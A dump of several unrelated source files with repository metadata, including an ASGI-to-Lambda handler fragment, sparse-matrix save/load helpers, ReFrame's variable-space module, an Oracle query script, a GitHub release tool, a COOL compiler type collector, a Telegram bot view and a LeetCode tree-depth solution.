            handler = AbstractHandler.from_trigger(
                event, context, **self.handler_kwargs
            )
            request = handler.request
            if isinstance(request, WsRequest):
                # Prefer an explicitly configured endpoint over the one derived
                # from the event.
                api_gateway_endpoint_url = (
                    self.api_gateway_endpoint_url or handler.api_gateway_endpoint_url
                )
                websocket = WebSocket(
                    dsn=self.dsn,
                    api_gateway_endpoint_url=api_gateway_endpoint_url,
                    api_gateway_region_name=self.api_gateway_region_name,
                    connect_hook=self.connect_hook,
                    disconnect_hook=self.disconnect_hook,
                )
                websocket_cycle = WebSocketCycle(
                    request, handler.message_type, handler.connection_id, websocket
                )
                response = websocket_cycle(self.app, handler.body)
            else:
                http_cycle = HTTPCycle(request)
                response = http_cycle(self.app, handler.body)

            # Shape the ASGI response into the Lambda/API Gateway format
            # (still inside the lifespan context, matching original ordering).
            return handler.transform_response(response)
| 36.428571
| 88
| 0.654248
|
4a1102f91939953f173629a36f66958b61719cc2
| 787
|
py
|
Python
|
savenpz.py
|
bHodges97/pdf-from-site
|
7982619567f006a62a11cecfb7d617bc968e9ddc
|
[
"MIT"
] | 2
|
2021-07-06T01:58:06.000Z
|
2021-09-25T07:38:55.000Z
|
savenpz.py
|
bHodges97/pdf-from-site
|
7982619567f006a62a11cecfb7d617bc968e9ddc
|
[
"MIT"
] | 1
|
2021-06-02T00:17:30.000Z
|
2021-06-02T00:17:30.000Z
|
savenpz.py
|
bHodges97/pdf-from-site
|
7982619567f006a62a11cecfb7d617bc968e9ddc
|
[
"MIT"
] | null | null | null |
import numpy as np
from scipy.sparse import csr_matrix
def save_npz(file, matrix, vocab, fixed=(), compressed=False):
    """Save a CSR matrix plus its vocabulary to a NumPy ``.npz`` archive.

    Parameters
    ----------
    file : str or file-like
        Target passed straight to ``numpy.savez`` / ``savez_compressed``.
    matrix : scipy.sparse.csr_matrix
        Matrix whose ``data``/``indices``/``indptr`` and shape are stored.
    vocab : array-like
        Vocabulary stored under the ``vocab`` key.
    fixed : iterable, optional
        Indices stored under the ``fixed`` key; empty by default.
        (Fix: default was the mutable ``[]`` anti-pattern.)
    compressed : bool, optional
        When True, write a compressed archive.
    """
    arrays_dict = {
        'indices': matrix.indices,
        'indptr': matrix.indptr,
        'shape': matrix.shape,
        'data': matrix.data,
        'vocab': vocab,
        'fixed': np.array(list(fixed)),
    }
    saver = np.savez_compressed if compressed else np.savez
    saver(file, **arrays_dict)
def load_npz(file):
    """Load a CSR matrix, vocab and (optionally) fixed indices saved by save_npz."""
    with np.load(file) as archive:
        sparse = csr_matrix(
            (archive['data'], archive['indices'], archive['indptr']),
            shape=archive['shape'],
        )
        vocabulary = archive['vocab']
        # Older archives may lack the 'fixed' key; read it while still open.
        fixed = archive['fixed'] if 'fixed' in archive else None
    if fixed is None:
        return (sparse, vocabulary)
    return (sparse, vocabulary, fixed)
| 30.269231
| 105
| 0.623888
|
4a11031ee4ab19e588b1ae096080ac51a7d84a35
| 1,164
|
py
|
Python
|
exercicios/ex084.py
|
renaisaalves/Python-CursoemVideo
|
ffb7b2cb95ae6ff5a4f2266e5c3ed2fc33951808
|
[
"MIT"
] | null | null | null |
exercicios/ex084.py
|
renaisaalves/Python-CursoemVideo
|
ffb7b2cb95ae6ff5a4f2266e5c3ed2fc33951808
|
[
"MIT"
] | null | null | null |
exercicios/ex084.py
|
renaisaalves/Python-CursoemVideo
|
ffb7b2cb95ae6ff5a4f2266e5c3ed2fc33951808
|
[
"MIT"
] | null | null | null |
# ex084: Read the name and weight of several people, storing everything in a
# list. At the end show: A) how many people were registered; B) a listing of
# the heaviest people; C) a listing of the lightest people.
cadastro = []
listagem = list()
maior = menor = 0
while True:
    cadastro.append(str(input('Nome: ')).capitalize())
    cadastro.append(int(input('Peso: ')))
    if len(listagem) == 0:
        # The first person defines both extremes.
        maior = menor = cadastro[1]
    else:
        if cadastro[1] > maior:
            maior = cadastro[1]
        if cadastro[1] < menor:
            menor = cadastro[1]
    # Append a *copy*: cadastro itself is cleared right below.
    listagem.append(cadastro[:])
    cadastro.clear()
    resposta = str(input('Quer continuar? [Sim/Não]: ')).upper()
    # NOTE: substring test — any of 'S', 'SI', 'SIM', 'IM', ... continues.
    if resposta not in 'SIMS':
        break
print('=' * 30)
print(f'{len(listagem)} pessoas foram cadastradas:')
print(f'O maior peso foi de {maior}kg. ')
print(f'O menor peso foi de {menor}kg. ')
print(listagem)
print('=' * 30)
for i in listagem:
    if i[1] == maior:
        print(f'{i[0]} é o maior.')
    elif i[1] == menor:
        # Bug fix: only list people at the extremes; previously everyone who
        # was not the heaviest was reported as the lightest.
        print(f'{i[0]} é o menor.')
| 32.333333
| 236
| 0.627148
|
4a110358b55894e94f1ca4b74bcfba6f2d9f7f08
| 7,537
|
py
|
Python
|
reframe/core/variables.py
|
toxa81/reframe
|
81357405c0c53ba9def4048c29774c867c69adc2
|
[
"BSD-3-Clause"
] | null | null | null |
reframe/core/variables.py
|
toxa81/reframe
|
81357405c0c53ba9def4048c29774c867c69adc2
|
[
"BSD-3-Clause"
] | null | null | null |
reframe/core/variables.py
|
toxa81/reframe
|
81357405c0c53ba9def4048c29774c867c69adc2
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright 2016-2021 Swiss National Supercomputing Centre (CSCS/ETH Zurich)
# ReFrame Project Developers. See the top-level LICENSE file for details.
#
# SPDX-License-Identifier: BSD-3-Clause
#
# Functionality to build extensible variable spaces into ReFrame tests.
#
import copy
import reframe.core.namespaces as namespaces
import reframe.core.fields as fields
class _UndefinedType:
    '''Sentinel type marking a variable as undefined.'''

    __slots__ = ()

    def __deepcopy__(self, memo):
        # The sentinel must stay a singleton: deep copies preserve identity
        # so `is _Undefined` checks keep working on copied variable spaces.
        return self


_Undefined = _UndefinedType()
class VarDirective:
    '''Base class for the variable directives.

    Subclasses (e.g. ``TestVar``, ``UndefineVar``) record an action to apply
    to a test variable when the owning class body is processed.
    '''
class TestVar(VarDirective):
    '''Regression test variable class.

    Stores the attributes of a variable when defined directly in the class
    body. Instances of this class are injected into the regression test
    during class instantiation.

    :meta private:
    '''

    def __init__(self, *args, **kwargs):
        field_type = kwargs.pop('field', fields.TypedField)
        default = kwargs.pop('value', _Undefined)
        if not issubclass(field_type, fields.Field):
            raise ValueError(
                f'field {field_type!r} is not derived from '
                f'{fields.Field.__qualname__}'
            )

        self.field_type = field_type
        self._default_value = default
        # Remaining positional/keyword args are forwarded to the field type
        # when the variable is injected into the test class.
        self.args = args
        self.kwargs = kwargs

    def is_defined(self):
        '''Whether this variable currently has a default value.'''
        return self._default_value is not _Undefined

    def undefine(self):
        '''Drop the default value, flagging the variable as undefined.'''
        self._default_value = _Undefined

    def define(self, value):
        '''Set (or replace) the default value.'''
        self._default_value = value

    def __set_name__(self, owner, name):
        self.name = name

    @property
    def default_value(self):
        # Variables must be returned by-value to prevent an instance from
        # modifying the class variable space.
        return copy.deepcopy(self._default_value)
class UndefineVar(VarDirective):
    '''Directive flagging a previously declared variable as undefined.'''

    def __init__(self):
        self.default_value = _Undefined
class VarSpace(namespaces.Namespace):
    '''Variable space of a regression test.

    Store the variables of a regression test. This variable space is stored
    in the regression test class under the class attribute ``_rfm_var_space``.

    A target class can be provided to the
    :func:`__init__` method, which is the regression test where the
    VarSpace is to be built. During this call to
    :func:`__init__`, the VarSpace inherits all the VarSpace from the base
    classes of the target class. After this, the VarSpace is extended with
    the information from the local variable space, which is stored under the
    target class' attribute ``_rfm_local_var_space``. If no target class is
    provided, the VarSpace is simply initialized as empty.
    '''

    @property
    def local_namespace_name(self):
        # Class attribute holding the per-class (not inherited) var space.
        return '_rfm_local_var_space'

    @property
    def namespace_name(self):
        # Class attribute holding the fully merged var space.
        return '_rfm_var_space'

    def __init__(self, target_cls=None, illegal_names=None):
        # Set to register the variables already injected in the class
        self._injected_vars = set()
        super().__init__(target_cls, illegal_names)

    def join(self, other, cls):
        '''Join an existing VarSpace into the current one.

        :param other: instance of the VarSpace class.
        :param cls: the target class.
        '''
        for key, var in other.items():
            # Make doubly declared vars illegal. Note that this will be
            # triggered when inheriting from multiple RegressionTest classes.
            if key in self.vars:
                raise ValueError(
                    f'variable {key!r} is declared in more than one of the '
                    f'parent classes of class {cls.__qualname__!r}'
                )

            # Deep copy so subclasses never share mutable state with parents.
            self.vars[key] = copy.deepcopy(var)

        # Carry over the set of injected variables
        self._injected_vars.update(other._injected_vars)

    def extend(self, cls):
        '''Extend the VarSpace with the content in the LocalVarSpace.

        Merge the VarSpace inherited from the base classes with the
        LocalVarSpace. Note that the LocalVarSpace can also contain
        define and undefine actions on existing vars. Thus, since it
        does not make sense to define and undefine a var in the same
        class, the order on which the define and undefine functions
        are called is not preserved. In fact, applying more than one
        of these actions on the same var for the same local var space
        is disallowed.
        '''
        local_varspace = getattr(cls, self.local_namespace_name)
        for key, var in local_varspace.items():
            if isinstance(var, TestVar):
                # Disable redeclaring a variable
                if key in self.vars:
                    raise ValueError(
                        f'cannot redeclare the variable {key!r}'
                    )

                # Add a new var
                self.vars[key] = var
            elif isinstance(var, VarDirective):
                # Modify the value of a previously declared var.
                # If var is an instance of UndefineVar, we set its default
                # value to _Undefined. Alternatively, the value is just updated
                # with the user's input.
                self._check_var_is_declared(key)
                self.vars[key].define(var.default_value)

        # If any previously declared variable was defined in the class body
        # by directly assigning it a value, retrieve this value from the class
        # namespace and update it into the variable space.
        _assigned_vars = set()
        for key, value in cls.__dict__.items():
            if key in local_varspace:
                raise ValueError(
                    f'cannot specify more than one action on variable '
                    f'{key!r} in the same class'
                )
            elif key in self.vars:
                self.vars[key].define(value)
                _assigned_vars.add(key)

        # Delete the vars from the class __dict__.
        for key in _assigned_vars:
            delattr(cls, key)

    def _check_var_is_declared(self, key):
        # Helper: directives may only act on vars declared in a parent class.
        if key not in self.vars:
            raise ValueError(
                f'variable {key!r} has not been declared'
            )

    def sanity(self, cls, illegal_names=None):
        '''Sanity checks post-creation of the var namespace.

        By default, we make illegal to have any item in the namespace
        that clashes with a member of the target class unless this member
        was injected by this namespace.
        '''
        if illegal_names is None:
            illegal_names = set(dir(cls))

        for key in self._namespace:
            if key in illegal_names and key not in self._injected_vars:
                raise ValueError(
                    f'{key!r} already defined in class '
                    f'{cls.__qualname__!r}'
                )

    def inject(self, obj, cls):
        '''Insert the vars in the regression test.

        :param obj: The test object.
        :param cls: The test class.
        '''
        for name, var in self.items():
            # Create the descriptor field on the class, then seed the instance
            # with the default value (when one is defined).
            setattr(cls, name, var.field_type(*var.args, **var.kwargs))
            getattr(cls, name).__set_name__(obj, name)

            # If the var is defined, set its value
            if var.is_defined():
                setattr(obj, name, var.default_value)

            # Track the variables that have been injected.
            self._injected_vars.add(name)

    @property
    def vars(self):
        return self._namespace
| 34.259091
| 79
| 0.627703
|
4a1103aeb8eb2970fd27433a320cf6496fa444da
| 671
|
py
|
Python
|
build/navigation/global_planner/catkin_generated/pkg.develspace.context.pc.py
|
EurobotMDX/eurobot_2020_odroid_cam
|
ddd9a17d53899f1c615816fd74512c112ecad188
|
[
"MIT"
] | 4
|
2019-10-26T18:48:51.000Z
|
2020-02-27T19:31:36.000Z
|
build/navigation/global_planner/catkin_generated/pkg.develspace.context.pc.py
|
EurobotMDX/eurobot_2020_odroid_cam
|
ddd9a17d53899f1c615816fd74512c112ecad188
|
[
"MIT"
] | null | null | null |
build/navigation/global_planner/catkin_generated/pkg.develspace.context.pc.py
|
EurobotMDX/eurobot_2020_odroid_cam
|
ddd9a17d53899f1c615816fd74512c112ecad188
|
[
"MIT"
] | 1
|
2019-10-26T18:50:48.000Z
|
2019-10-26T18:50:48.000Z
|
# generated from catkin/cmake/template/pkg.context.pc.in
# (auto-generated pkg-config context for the global_planner package)
CATKIN_PACKAGE_PREFIX = ""
# Exported include directories; empty list when the raw string is empty.
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "/home/ros/lidar_ws/devel/include;/home/ros/lidar_ws/src/navigation/global_planner/include".split(';') if "/home/ros/lidar_ws/devel/include;/home/ros/lidar_ws/src/navigation/global_planner/include" != "" else []
# catkin package dependencies, space-separated.
PROJECT_CATKIN_DEPENDS = "costmap_2d;dynamic_reconfigure;geometry_msgs;nav_core;navfn;nav_msgs;pluginlib;roscpp;tf".replace(';', ' ')
# Linker flags exported by this package.
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "-lglobal_planner".split(';') if "-lglobal_planner" != "" else []
PROJECT_NAME = "global_planner"
PROJECT_SPACE_DIR = "/home/ros/lidar_ws/devel"
PROJECT_VERSION = "1.14.5"
| 245
| 0.782414
|
4a11040b00fd018bb9df6cdcf5e2e0bcf545877a
| 2,435
|
py
|
Python
|
db-files/connect.py
|
buzzer4mornin/CTMP-ThesisProject
|
83e54700d0edd8dd141127998dacd7faf11be081
|
[
"MIT"
] | 5
|
2021-07-11T13:36:37.000Z
|
2022-02-07T22:21:13.000Z
|
db-files/connect.py
|
buzzer4mornin/CTMP-ThesisProject
|
83e54700d0edd8dd141127998dacd7faf11be081
|
[
"MIT"
] | null | null | null |
db-files/connect.py
|
buzzer4mornin/CTMP-ThesisProject
|
83e54700d0edd8dd141127998dacd7faf11be081
|
[
"MIT"
] | null | null | null |
import cx_Oracle as cx
import pandas as pd
import os
# Run relative to this file's directory so credentials.txt and the pickled
# outputs resolve regardless of the caller's working directory.
os.chdir(os.path.dirname(__file__))
# Absolute directory of this file, used as the output prefix below.
currdir = str(os.path.dirname(os.path.abspath(__file__)))
def get_credentials(path: str = './credentials.txt') -> list:
    """Read ``key: value`` lines (username/password) from a credentials file.

    Parameters
    ----------
    path : str, optional
        Location of the credentials file; defaults to ``./credentials.txt``
        so existing callers keep working.

    Returns
    -------
    list
        The values in file order (e.g. ``[username, password]``), with
        trailing spaces and newlines stripped.
    """
    creds = []
    with open(path) as f:
        for line in f.readlines():
            try:
                # Each line is expected to look like "key: value".
                _, value = line.split(": ")
            except ValueError:
                # Bug fix: was a bare `except:` and exited with status 0;
                # a malformed file is an error, so exit non-zero.
                print('Add your username and password in credentials file')
                exit(1)
            creds.append(value.rstrip(" \n"))

    return creds
"-*- Disconnect from VPN -*-"
dsnStr = cx.makedsn("tirpitz.ms.mff.cuni.cz", 1511, "jedenact")
print(dsnStr)
db_credentials = get_credentials()
try:
# Connect to DB
db = cx.connect(*db_credentials, dsn=dsnStr)
cur = db.cursor()
# -- 1st Query -- [Get USER table] [UNCOMMENT to run]
'''cur.execute("select USERID from A_MUSERS")
db.commit()
df = pd.DataFrame(cur.fetchall())
df.columns = ["USERID"]
df.to_pickle(currdir + '/df_user')'''
# -- 2nd Query -- [Get RATING table] [UNCOMMENT to run]
'''cur.execute("select USERID, MOVIEID, RATING from A_MRATINGS")
db.commit()
df = pd.DataFrame(cur.fetchall())
df.columns = ["USERID", "MOVIEID", "RATING"]
df.to_pickle(currdir + '/df_rating')'''
# -- 3rd Query -- [Get MOVIE table] (parse XML plot from IMDB) [UNCOMMENT to run]
'''cur.execute(
"SELECT e.TT, e.XML.getClobval() AS coXML, A_MMOVIES.MOVIEID FROM IMDB e inner join A_MMOVIES on e.TT = A_MMOVIES.TT")
db.commit()
df = cur.fetchall()
# columns: TT(str) -- CLOB(obj) -- MOVIEID(int)
print(df)
plot_extractor = lambda xml: (xml.split('plot="'))[1].split('"')[0]
for i in range(len(df)):
df[i] = list(df[i])
df[i][1] = plot_extractor(df[i][1].read())
print(i)
df = pd.DataFrame(df)
df.columns = ["TT", "MOVIEPLOT", "MOVIEID"]
df.to_pickle(currdir + '/df_movie')'''
# Another way to Query
# for row in cur.execute("select ACTORS from IMDB"):
# print(row)
print("Table Created successful")
except cx.DatabaseError as e:
if str(e).startswith("ORA-24454"):
print("ERROR check VPN connection!")
else:
print("ERROR", e, )
else:
# Close all when done
if cur: cur.close()
if db: db.close()
| 29.337349
| 127
| 0.595893
|
4a11040d65bf9a1959a1f48bef876024d0aa5dac
| 5,754
|
py
|
Python
|
ci_tools/github_release.py
|
mchaaler/mkdocs-gallery
|
48a96bd32eb036b1ef82b64b4ef79a76c499eea9
|
[
"BSD-3-Clause"
] | 9
|
2021-12-14T17:03:13.000Z
|
2022-03-26T17:16:26.000Z
|
ci_tools/github_release.py
|
mchaaler/mkdocs-gallery
|
48a96bd32eb036b1ef82b64b4ef79a76c499eea9
|
[
"BSD-3-Clause"
] | 40
|
2021-12-09T08:09:03.000Z
|
2022-03-30T21:29:34.000Z
|
ci_tools/github_release.py
|
mchaaler/mkdocs-gallery
|
48a96bd32eb036b1ef82b64b4ef79a76c499eea9
|
[
"BSD-3-Clause"
] | 2
|
2020-08-05T07:06:44.000Z
|
2021-03-31T21:33:19.000Z
|
# a clone of the ruby example https://gist.github.com/valeriomazzeo/5491aee76f758f7352e2e6611ce87ec1
import os
from os import path
import re
import click
from click import Path
from github import Github, UnknownObjectException
# from valid8 import validate not compliant with python 2.7
@click.command()
@click.option('-u', '--user', help='GitHub username')
@click.option('-p', '--pwd', help='GitHub password')
@click.option('-s', '--secret', help='GitHub access token')
@click.option('-r', '--repo-slug', help='Repo slug. i.e.: apple/swift')
@click.option('-cf', '--changelog-file', help='Changelog file path')
@click.option('-d', '--doc-url', help='Documentation url')
@click.option('-df', '--data-file', help='Data file to upload',
              type=Path(exists=True, file_okay=True, dir_okay=False, resolve_path=True))
@click.argument('tag')
def create_or_update_release(user, pwd, secret, repo_slug, changelog_file, doc_url, data_file, tag):
    """
    Creates or updates (TODO)
    a github release corresponding to git tag <TAG>.
    """
    # 1- AUTHENTICATION: either username/password or an access token.
    if user is not None and secret is None:
        # NOTE: asserts are stripped under `python -O`; kept for parity with
        # the rest of this script.
        assert isinstance(user, str)
        assert isinstance(pwd, str)
        g = Github(user, pwd)
    elif user is None and secret is not None:
        assert isinstance(secret, str)
        g = Github(secret)
    else:
        raise ValueError("You should either provide username/password OR an access token")
    click.echo("Logged in as {user_name}".format(user_name=g.get_user()))

    # 2- CHANGELOG VALIDATION: find the changelog section whose heading
    # mentions <tag>; the heading becomes the release title, the section body
    # the release message.  Raw string avoids invalid-escape warnings.
    regex_pattern = r"[\s\S]*[\n][#]+[\s]*(?P<title>[\S ]*%s[\S ]*)[\n]+?(?P<body>[\s\S]*?)[\n]*?(\n#|$)" % re.escape(tag)
    changelog_section = re.compile(regex_pattern)
    if changelog_file is not None:
        assert os.path.exists(changelog_file), "changelog file should be a valid file path"

        with open(changelog_file) as f:
            contents = f.read()

        # Bug fix: the original called .groupdict() before checking for a
        # failed match, raising AttributeError instead of this ValueError.
        match = changelog_section.match(contents)
        if match is None:
            raise ValueError("Unable to find changelog section matching regexp pattern in changelog file.")
        title = match.group('title')
        message = match.group('body')
    else:
        title = tag
        message = ''

    # append footer if doc url is provided
    message += "\n\nSee [documentation page](%s) for details." % doc_url

    # 3- REPOSITORY EXPLORATION
    assert isinstance(repo_slug, str) and len(repo_slug) > 0, "repo_slug should be a non-empty string"
    repo = g.get_repo(repo_slug)

    # -- Is there a tag with that name ?
    try:
        tag_ref = repo.get_git_ref("tags/" + tag)
    except UnknownObjectException:
        raise ValueError("No tag with name %s exists in repository %s" % (tag, repo.name))

    # -- Is there already a release with that tag name ?
    click.echo("Checking if release %s already exists in repository %s" % (tag, repo.name))
    try:
        release = repo.get_release(tag)
        if release is not None:
            raise ValueError("Release %s already exists in repository %s. Please set overwrite to True if you wish to "
                             "update the release (Not yet supported)" % (tag, repo.name))
    except UnknownObjectException:
        # Release does not exist: we can safely create it.
        click.echo("Creating release %s on repo: %s" % (tag, repo.name))
        click.echo("Release title: '%s'" % title)
        click.echo("Release message:\n--\n%s\n--\n" % message)
        repo.create_git_release(tag=tag, name=title,
                                message=message,
                                draft=False, prerelease=False)

        # add the asset file if needed
        if data_file is not None:
            # NOTE(review): busy-polls until GitHub reports the new release;
            # there is no timeout, so a propagation failure loops forever.
            release = None
            while release is None:
                release = repo.get_release(tag)
            release.upload_asset(path=data_file, label=path.split(data_file)[1], content_type="application/gzip")
# --- Memo ---
# release.target_commitish # 'master'
# release.tag_name # '0.5.0'
# release.title # 'First public release'
# release.body # markdown body
# release.draft # False
# release.prerelease # False
# #
# release.author
# release.created_at # datetime.datetime(2018, 11, 9, 17, 49, 56)
# release.published_at # datetime.datetime(2018, 11, 9, 20, 11, 10)
# release.last_modified # None
# #
# release.id # 13928525
# release.etag # 'W/"dfab7a13086d1b44fe290d5d04125124"'
# release.url # 'https://api.github.com/repos/smarie/python-odsclient/releases/13928525'
# release.html_url # 'https://github.com/smarie/python-odsclient/releases/tag/0.5.0'
# release.tarball_url # 'https://api.github.com/repos/smarie/python-odsclient/tarball/0.5.0'
# release.zipball_url # 'https://api.github.com/repos/smarie/python-odsclient/zipball/0.5.0'
# release.upload_url # 'https://uploads.github.com/repos/smarie/python-odsclient/releases/13928525/assets{?name,label}'
# Script entry point: click parses the CLI options/argument.
if __name__ == '__main__':
    create_or_update_release()
| 45.666667
| 129
| 0.623045
|
4a11045642c8185666c70e80cbccbf29b5885417
| 3,892
|
py
|
Python
|
src/semantics/type_collector.py
|
RodroVMS/cool-compiler-2022
|
718f962a647dc62be8562c946cf76fad419c08c5
|
[
"MIT"
] | null | null | null |
src/semantics/type_collector.py
|
RodroVMS/cool-compiler-2022
|
718f962a647dc62be8562c946cf76fad419c08c5
|
[
"MIT"
] | null | null | null |
src/semantics/type_collector.py
|
RodroVMS/cool-compiler-2022
|
718f962a647dc62be8562c946cf76fad419c08c5
|
[
"MIT"
] | null | null | null |
import semantics.visitor as visitor
from parsing.ast import Node, ProgramNode, ClassDeclarationNode
from semantics.tools import SemanticError
from semantics.tools import Context
class TypeCollector(object):
    """First semantic pass of the COOL compiler: collect declared types.

    Populates the `Context` with every class name, records the inheritance
    graph and reorders declarations so that parents precede children.
    Errors are accumulated in `self.errors` rather than raised.
    """

    def __init__(self) -> None:
        self.context = Context()
        self.errors = []
        # Inheritance graph: parent name -> list of child names, preloaded
        # with the builtin types rooted at Object.
        self.type_graph = {"Object": ["IO", "String", "Int", "Bool"],
                           "IO": [], "String": [], "Int": [], "Bool": []}
        # Maps a class name to its AST node, for reordering later.
        self.node_dict = dict()

    @visitor.on('node')
    def visit(self, node):
        pass

    @visitor.when(ProgramNode)
    def visit(self, node):
        """Collect all classes of the program and order them hierarchically."""
        self.context = Context()
        self.init_default_classes()

        for class_def in node.declarations:
            self.visit(class_def)

        new_declarations = self.get_type_hierarchy()
        node.declarations = new_declarations
        self.context.type_graph = self.type_graph

    @visitor.when(ClassDeclarationNode)
    def visit(self, node):
        """Register one class declaration and its inheritance edge."""
        try:
            self.context.create_type(node.id)
            self.node_dict[node.id] = node
            try:
                self.type_graph[node.id]
            except KeyError:
                self.type_graph[node.id] = []
            if node.parent:
                # Bug fix: the set used to be {'String', 'Int, Bool'} — two
                # elements where 'Int, Bool' was a single string — so
                # inheriting from Int or Bool was silently accepted.
                if node.parent in {'String', 'Int', 'Bool'}:
                    raise SemanticError(f"Type \'{node.id}\' cannot inherit from \'{node.parent}\' because is forbidden.")
                try:
                    self.type_graph[node.parent].append(node.id)
                except KeyError:
                    # Parent not seen yet: create its adjacency entry.
                    self.type_graph[node.parent] = [node.id]
            else:
                # Classes without an explicit parent inherit from Object.
                node.parent = "Object"
                self.type_graph["Object"].append(node.id)
        except SemanticError as error:
            self.add_error(node, error.text)

    def get_type_hierarchy(self):
        """Return class nodes ordered parents-first; detect heritage cycles."""
        visited = set(["Object"])
        new_order = []
        self.dfs_type_graph("Object", self.type_graph, visited, new_order, 1)

        circular_heritage_errors = []
        for node in self.type_graph:
            if not node in visited:
                # Unreached from Object => part of an inheritance cycle.
                visited.add(node)
                path = [node]
                circular_heritage_errors.append(self.check_circular_heritage(node, self.type_graph, path, visited))
                new_order = new_order + [self.node_dict[node] for node in path]

        if circular_heritage_errors:
            # (Removed a stray debug print of the raw error list here.)
            error = "Semantic Error: Circular Heritage:\n"
            error += "\n".join(err for err in circular_heritage_errors)
            self.add_error(None, error)

        return new_order

    def dfs_type_graph(self, root, graph, visited: set, new_order, index):
        """Depth-first walk assigning a hierarchy index to each user class."""
        if not root in graph:
            return
        for node in graph[root]:
            if node in visited:
                continue
            visited.add(node)
            if node not in {"Int", "String", "IO", "Bool", "Object"}:
                new_order.append(self.node_dict[node])
            self.context.get_type(node, unpacked=True).index = index
            self.dfs_type_graph(node, graph, visited, new_order, index + 1)

    def check_circular_heritage(self, root, graph, path, visited):
        """Follow the cycle starting at `root`, returning it as 'A -> B -> A'."""
        for node in graph[root]:
            if node in path:
                return ' -> '.join(child for child in path + [path[0]])

            visited.add(node)
            path.append(node)
            return self.check_circular_heritage(node, graph, path, visited)

    def init_default_classes(self):
        """Preinstall the builtin COOL types; Object gets hierarchy index 0."""
        self.context.create_type('Object').index = 0
        self.context.create_type('String')
        self.context.create_type('Int')
        self.context.create_type('IO')
        self.context.create_type('Bool')

    def add_error(self, node: Node, text: str):
        """Record an error annotated with the node's source position."""
        line, col = node.get_position() if node else (0, 0)
        self.errors.append(((line, col), f"({line}, {col}) - " + text))
| 37.786408
| 122
| 0.581449
|
4a110491feca5a85ba8ccca1097642ce914d7a58
| 1,913
|
py
|
Python
|
src/view.py
|
gordinmitya/supcardbot
|
fa3bfe5c51ad3256fda7418ffd267c861ff7d1ef
|
[
"MIT"
] | 1
|
2021-08-16T13:27:32.000Z
|
2021-08-16T13:27:32.000Z
|
src/view.py
|
gordinmitya/supcardbot
|
fa3bfe5c51ad3256fda7418ffd267c861ff7d1ef
|
[
"MIT"
] | null | null | null |
src/view.py
|
gordinmitya/supcardbot
|
fa3bfe5c51ad3256fda7418ffd267c861ff7d1ef
|
[
"MIT"
] | null | null | null |
from telegram import Message
# Currency suffix appended to all amounts shown to the user.
RUB = 'р'


def currency(amount: int) -> str:
    """Format an integer ruble amount with the currency suffix."""
    return '{}{}'.format(amount, RUB)
class View:
    """Renders all bot replies for one incoming Telegram message."""

    def __init__(self, message: Message) -> None:
        # The message we reply to.
        self.m = message

    def started(self, default_limit: int) -> None:
        """Greeting on first contact: asks for the 13-digit card number."""
        return self.m.reply_text(
            "Давай знакомиться!\n" +
            "Мне понадобится номер карты, но не тот, что на передней стороне, а с задней, там где штрихкод - 13 цифр.\n" +
            "Отправь мне этот номер /card 1234567890123\n" +
            f"Для того чтобы вычислить сколько осталось денег на сегодня по умолчанию используется лимит в {default_limit} рублей.\n" +
            "Ты можешь изменить лимит командой /limit 800"
        )

    def card_added(self, today: int, total: int) -> None:
        """Confirmation after a card is registered, with current balances."""
        return self.m.reply_text(
            "Карта добавлена!\n" +
            self._info_text(today, total)
        )

    def no_card(self) -> None:
        """Prompt shown when a command requires a card but none is set."""
        return self.m.reply_text(
            "Сначала необходимо добавить карту.\n" +
            "Отправь 13 цифр с обратной стороны карты (рядом со штрихкодом), командой\n" +
            "/card 1234567890123"
        )

    def limit_applied_no_card(self, new_limit: int) -> None:
        """Limit accepted but no card registered yet."""
        return self.m.reply_text(
            f"Лимит изменен на {new_limit}\n" +
            "Осталось добавить карту."
        )

    def limit_applied(self, new_limit: int, today: int) -> None:
        """Limit accepted; show the remaining amount for today."""
        return self.m.reply_text(
            f"С учетом нового лимита в {new_limit} рублей,\n" +
            f"на сегодня осталось {currency(today)}"
        )

    def help(self, card: int, limit: int) -> None:
        # TODO: help text is a placeholder ("not written yet").
        return self.m.reply_text("help не дописал еще")

    def _info_text(self, today: int, total: int) -> str:
        # Shared balance summary used by card_added and info.
        return f"сегодня {currency(today)}\nвсего {currency(total)}"

    def info(self, today: int, total: int) -> None:
        """Plain balance report."""
        return self.m.reply_text(self._info_text(today, total))
| 35.425926
| 135
| 0.6069
|
4a1104e38634365519a7ecb4ebd379963258de28
| 666
|
py
|
Python
|
leetCode/maximum_depth_of_binary_tree.py
|
yskang/AlgorithmPractice
|
31b76e38b4c2f1e3e29fb029587662a745437912
|
[
"MIT"
] | null | null | null |
leetCode/maximum_depth_of_binary_tree.py
|
yskang/AlgorithmPractice
|
31b76e38b4c2f1e3e29fb029587662a745437912
|
[
"MIT"
] | 1
|
2019-11-04T06:44:04.000Z
|
2019-11-04T06:46:55.000Z
|
leetCode/maximum_depth_of_binary_tree.py
|
yskang/AlgorithmPractice
|
31b76e38b4c2f1e3e29fb029587662a745437912
|
[
"MIT"
] | null | null | null |
# Title: Maximum Depth of Binary Tree
# Link: https://leetcode.com/problems/maximum-depth-of-binary-tree/
class TreeNode:
    """Binary tree node: a value plus optional left/right children."""
    def __init__(self, val=0, left=None, right=None):
        self.val, self.left, self.right = val, left, right


class Problem:
    """LeetCode 104: Maximum Depth of Binary Tree."""
    def max_depth(self, root: TreeNode) -> int:
        """Return the node count along the longest root-to-leaf path.

        Iterative breadth-first traversal: each processed level adds one
        to the depth; an empty tree has depth 0.
        """
        if not root:
            return 0
        depth = 0
        level = [root]
        while level:
            depth += 1
            level = [child
                     for node in level
                     for child in (node.left, node.right)
                     if child]
        return depth
def solution():
    """Build the sample tree [3,9,20,null,null,15,7] and return its depth."""
    left = TreeNode(9)
    right = TreeNode(20, TreeNode(15), TreeNode(7))
    sample_tree = TreeNode(3, left, right)
    solver = Problem()
    return solver.max_depth(sample_tree)
def main():
    """Script entry point: print the depth of the sample tree."""
    result = solution()
    print(result)


if __name__ == '__main__':
    main()
| 22.965517
| 77
| 0.633634
|
4a11056ab8275292165e1a0a7d4d481f8d9530e0
| 6,470
|
py
|
Python
|
individual.py
|
ChangMinPark/genetic-algorithm-dct
|
d0112031e788061df6676d43160ec8ffbf92781a
|
[
"MIT"
] | null | null | null |
individual.py
|
ChangMinPark/genetic-algorithm-dct
|
d0112031e788061df6676d43160ec8ffbf92781a
|
[
"MIT"
] | null | null | null |
individual.py
|
ChangMinPark/genetic-algorithm-dct
|
d0112031e788061df6676d43160ec8ffbf92781a
|
